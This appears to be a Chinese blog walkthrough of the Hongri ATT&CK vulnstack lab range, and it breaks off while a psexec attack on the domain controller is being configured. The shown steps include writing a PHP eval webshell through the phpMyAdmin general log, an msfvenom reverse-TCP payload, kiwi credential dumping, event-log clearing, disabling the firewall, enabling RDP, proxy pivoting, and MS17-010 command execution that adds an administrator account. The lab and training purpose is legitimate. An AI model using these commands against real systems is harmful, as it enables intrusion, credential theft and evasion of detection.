红日ATT&CK实战系列靶机

登山则情满于山，观海则意溢于海。这篇文章主要讲述红日ATT&CK实战系列靶机相关的知识，希望能为你提供帮助。
红日ATT& CK实战系列靶机(一) 靶机信息

基本描述：红队实战系列，主要以真实企业环境为实例搭建一系列靶场，完全模拟ATT& CK测试链路进行搭建
下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
虚拟机初始密码：hongrisec@2019（开机后会提示更新密码）

环境搭建靶机文件
【红日ATT&CK实战系列靶机】下载好靶机环境后，解压完有三个文件夹
分别打开三个文件夹中的.vmx文件，使用vmware运行后会自动添加三个虚拟机

文章图片

网络配置
根据官网给出的网络配置图片来看
kali和win7同属于VM1网段(win7需要在虚拟机配置里新加一块网卡设置为VM1)
win7又与2008和2003属VM2网段

文章图片

测试路径
官网提供的测试路径如下：
测试主机：kali
web服务器：Win7
域成员：Win2003
域控：Server 2008

文章图片

常见问题
1. 扫描不到win7主机的开放端口
使用nmap扫描时，扫描不到该win7主机的开放端口
因为win7新加VM1网卡，网卡的基本信息没有配置

文章图片

配置一下网关这些信息，一般网关地址为.1或.2
可以用物理机ping测试下到哪个地址能通，来确定网关
配置如下，配置正确后网卡状态不再显示为未识别的网络，nmap可以正常扫描到端口

文章图片

2. 扫描不到win7主机80端口
解决第1个问题后，发现只能扫到5357端口
没有开启web服务，需要在c盘下找到phpstudy，手动开启并运行
和kali同网段的VM1网络的防火墙关闭，域网络的防火墙保持开放状态，按理说vm1的防火墙不应该关的，但是开着防火墙实在没法做，官网给的信息也没说VM1防火墙配置，就暂且这样吧

文章图片

文章图片

3.msf中文乱码
msf的shell界面输入命令后，中文的部分会乱码，输入下列命令可以缓解一部分

chcp 65001

信息搜集kali与win7同属VM1网络
使用nmap扫描VM1网段存活主机

nmap -sn 192.168.41.0/24

文章图片

发现.128主机，猜测为win7主机，对该主机进行扫描，发现扫描不到开放端口

参考常见问题目录下的问题1
nmap -A 192.168.41.128

文章图片

解决上述问题后，再次扫描发现只有5357端口开放
参考常见问题目录下的问题2

文章图片

解决以上两个问题后，再次扫描，扫描结果就比较正常了

文章图片

通过kali访问win7站点，发现为phpstudy探针
通过网页下方的mysql连接测试，发现使用默认密码(root/root)可以登录数据库

文章图片

漏洞利用访问http://192.168.41.128/phpmyadmin登录数据库，通过开启日志记录写入shell
在变量处，搜索general的值，修改为ON开启日志记录
开启日志记录，设置日志的存储路径，放在www目录下

文章图片

然后在SQL处执行sql语句，执行语句会被记录到日志文件中

SELECT "< ?php @eval($_POST[666]); ?> ";

文章图片

使用蚁剑连接1.php文件，成功连接到蚁剑
在www目录下发现一个yxcms的目录，也是一个站点
已经通过phpmyadmin拿到权限了就不搞这个yxcms了

文章图片

文章图片

弹个shell到msf上，方便后面操作
用msf生成一个exe程序，回连地址为kali

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.41.129LPORT=666 -f exe -o shell.exe

在kali上打开msf配置监听

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.41.129 set LPORT 666 run

通过蚁剑上传exe文件，在虚拟终端里运行，msf上线

文章图片

文章图片

权限提升msf提权到system权限

文章图片

然后迁移进程，找到一个64位且权限为SYSTEM的进程进行迁移
我这里是用的services.exe，pid为488

migrate 488

文章图片

加载mimikatz模块来抓取密码的话，可能抓不到密码，msf上也提示已经被kiwi取代

文章图片

加载kiwi模块，抓取用户密码
获取到账户的明文密码，administrator/hongrisec@2019!

load kiwi creds_all

文章图片

清除事件日志

文章图片

关闭主机的防火墙并打开3389端口，可以远程桌面连接

netsh advfirewall set allprofiles state off//关闭防火墙 netsh advfirewall show allprofiles state//查看当前防火墙状态 REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f//开放3389端口

文章图片

kali上可以通过rdesktop连接远程桌面

文章图片

内网搜集查看网络配置信息
发现有两个不同网段的网卡信息，和DNS域名信息，可以判断存在域

ipconfig /all

文章图片

文章图片

查看当前登录域和用户

net config workstation

文章图片

判断主域

net time /domain

文章图片

查看域内主机，发现域内有3台主机

net view

文章图片

查看当前域所有用户

net user /domain

文章图片

查看域控，为owa$

net group "domain controllers" /domain

文章图片

通过ping来判断其他域内其他2台主机的ip地址
发现两台主机的ip地址52.138和52.141

ping ROOT-TVI862UBEH.god.org ping OWA.god.org

文章图片

横向移动现在需要扫描另一个网段的主机，在msf中需要添加通往.52网段的路由
先退出msf的shell界面

run autoroute -s 192.168.52.0/24

文章图片

kali上设置proxychains代理设置代理
首先在msf中调用socks4a模块，但是找了许久发现没有这个模块了
最后发现可能是因为新版本kali应该是对socks4a和socks5模块进行了整合，socks_proxy模块信息如下，现在应该是变成了socks_proxy模块

文章图片

查看需要配置的参数，设置上本地的ip地址

set SRVHOST 127.0.0.1

文章图片

配置完成后，run运行，然后修改下代理的配置文件

vim /etc/proxychains4.conf

文章图片

挂上代理使用nmap扫描对.52网段的目标主机进行扫描
由于socks代理是tcp连接，这里nmap命令只能用tcp相关的，扫描速度较慢

nmap -Pn -sT 192.168.52.138// -Pn非ping扫描，-sT tcp连接扫描

发现扫描失败，应该是代理配置有问题

文章图片

排查许久后发现将proxychains配置文件里的dynamic_chain注释掉即可，别的不用注释

文章图片

挂上代理使用nmap扫描，之前的问题解决了，但是扫描的速度很慢

文章图片

建议使用msf的扫描模块进行扫描，nmap太慢了
调用tcp端口扫描模块，设置目标地址，run

use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.52.138

文章图片

分别对之前的两台主机进行端口扫描，都开放了445端口

文章图片

文章图片

先对.141主机进行ms17-010漏洞扫描
msf先搜索下ms17-010的模块，选用smb_ms17_010
发现存在漏洞

background search ms17-010 use 3 set RHOSTS 192.168.52.141

文章图片

试了几个漏洞模块都利用失败，需要通过ms17_010_command命令执行来利用
使用命令执行添加一个新用户

set COMMAND net user test hongrisec@2022 /add set RHOSTS 192.168.52.141

文章图片

再将test用户添加到管理组

set COMMAND net localgroup administrators test /add

文章图片

查看下是否添加成功

set COMMAND net localgroup administrators

文章图片

通过之前的端口信息发现主机未开放3389端口，再把3389端口打开
注册表这里不加引号的话可能会执行失败

set COMMAND REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

使用代理连接远程桌面到.141主机

proxychains rdesktop 192.168.52.141:3389

win2003主机拿下后，接下来是域控主机.138，同样是开放445端口
看网上的文章说域控这台主机也是通过ms17-010进行利用，但我这里试了下发现是不行
需要通过smb/psexec模块来利用

use exploit/windows/smb/psexec

文章图片

然后配置下信息
smb账号密码域信息是win7主机的，与之前抓到的用户名密码是一样的
LPORT端口需要为开放状态，可以通过之前的端口扫描结果来配置

set RHOSTS 192.168.52.138//域控主机ip set SMBDomain god//域 set SMBPass hongrisec@2019!//win7主机密码 set SMBUser Administrator//win7主机用户名 set LHOST 192.168.52.143//win7主机52段ip，做为跳板机 set LPORT 464//监听端口